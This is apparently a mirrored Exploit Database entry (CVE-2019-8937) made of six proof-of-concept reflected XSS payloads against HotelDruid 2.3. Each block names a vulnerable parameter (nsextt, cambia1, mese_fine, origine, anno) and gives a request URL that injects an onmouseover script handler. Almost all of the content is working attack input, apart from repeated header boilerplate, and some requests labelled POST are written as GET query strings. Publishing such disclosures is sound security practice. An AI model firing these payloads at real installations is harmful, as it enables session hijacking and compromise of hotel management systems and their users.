HotelDruid 2.3 – Cross-Site Scripting

• Exploit Database
• 52 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-02-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46429/

• ===========================================================================================
  # Exploit Title: Hoteldruid 2.3 - 'nsextt' XSS Injection
  # CVE: CVE-2019-8937
  # Date: 18-02-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
  # Software Link: https://sourceforge.net/projects/hoteldruid/
  # Version: v2.3
  # Category: Webapps
  # Tested on: Wamp64, @Win
  # Software description: HotelDruid is a property management system (PMS)
  designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
  manage from a web browser.
  ===========================================================================================
  # POC - XSS
  # Parameters : nsextt
  # Attack Pattern : x%22+onmouseover%3dalert(0x000981)+x%3d%22
  # GET Request : http://localhost/hoteldruid/visualizza_tabelle.php?nsextt=x"
  onmouseover=alert(0x000981) x="
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: Hoteldruid 2.3 - 'cambia1' XSS Injection
  # CVE: CVE-2019-8937
  # Date: 18-02-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
  # Software Link: https://sourceforge.net/projects/hoteldruid/
  # Version: v2.3
  # Category: Webapps
  # Tested on: Wamp64, @Win
  # Software description: HotelDruid is a property management system (PMS)
  designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
  manage from a web browser.
  ===========================================================================================
  # POC - XSS
  # Parameters : cambia1
  # Attack Pattern : " onmouseover="alert(8562604)
  # POST Request :
  http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671"
  onmouseover="alert(8562604)
  # https://i.hizliresim.com/6avvoE.jpg
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: Hoteldruid 2.3 - 'mese_fine' XSS Injection
  # CVE: CVE-2019-8937
  # Date: 18-02-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
  # Software Link: https://sourceforge.net/projects/hoteldruid/
  # Version: v2.3
  # Category: Webapps
  # Tested on: Wamp64, @Win
  # Software description: HotelDruid is a property management system (PMS)
  designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
  manage from a web browser.
  ===========================================================================================
  # POC - XSS
  # Parameters : mese_fine
  # Attack Pattern : " onmouseover="alert(6520859)
  # POST Request :
  http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13"
  onmouseover="alert(6520859)
  # https://i.hizliresim.com/v6NAzD.jpg
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection
  # CVE: CVE-2019-8937
  # Date: 18-02-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
  # Software Link: https://sourceforge.net/projects/hoteldruid/
  # Version: v2.3
  # Category: Webapps
  # Tested on: Wamp64, @Win
  # Software description: HotelDruid is a property management system (PMS)
  designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
  manage from a web browser.
  ===========================================================================================
  # POC - XSS
  # Parameters : origine
  # Attack Pattern : " onmouseover="alert(8987004))
  # POST Request :
  http://localhost/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php"
  onmouseover="alert(8987004)
  # https://i.hizliresim.com/v6NAmO.jpg
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: Hoteldruid 2.3 - 'anno' XSS Injection
  # CVE: CVE-2019-8937
  # Date: 18-02-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
  # Software Link: https://sourceforge.net/projects/hoteldruid/
  # Version: v2.3
  # Category: Webapps
  # Tested on: Wamp64, @Win
  # Software description: HotelDruid is a property management system (PMS)
  designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
  manage from a web browser.
  ===========================================================================================
  # POC - XSS
  # Parameters : anno
  # Attack Pattern : " onmouseover="alert(1548690)
  # POST Request :
  http://localhost/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019"
  onmouseover="alert(1548690)
  # https://i.hizliresim.com/EmAW68.jpg
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection
  # CVE: CVE-2019-8937
  # Date: 18-02-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
  # Software Link: https://sourceforge.net/projects/hoteldruid/
  # Version: v2.3
  # Category: Webapps
  # Tested on: Wamp64, @Win
  # Software description: HotelDruid is a property management system (PMS)
  designed to make hotel and hostel rooms
  bed and breakfast apartments, or any other kind of daily rental easy to
  manage from a web browser.
  ===========================================================================================
  # POC - XSS
  # Parameters : origine
  # Attack Pattern : " onmouseover="alert(6332576)
  # POST Request :
  http://localhost/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php"
  onmouseover="alert(6332576)
  # https://i.hizliresim.com/EmAW68.jpg
  ===========================================================================================